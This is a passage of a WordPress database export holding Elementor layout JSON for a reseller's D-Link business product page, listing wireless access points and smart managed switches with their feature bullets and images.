Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7600,3414,'_elementor_version','2.5.14'),(7601,3414,'_elementor_edit_mode','builder'),(7605,3415,'_elementor_template_type','post'),(7606,3415,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" 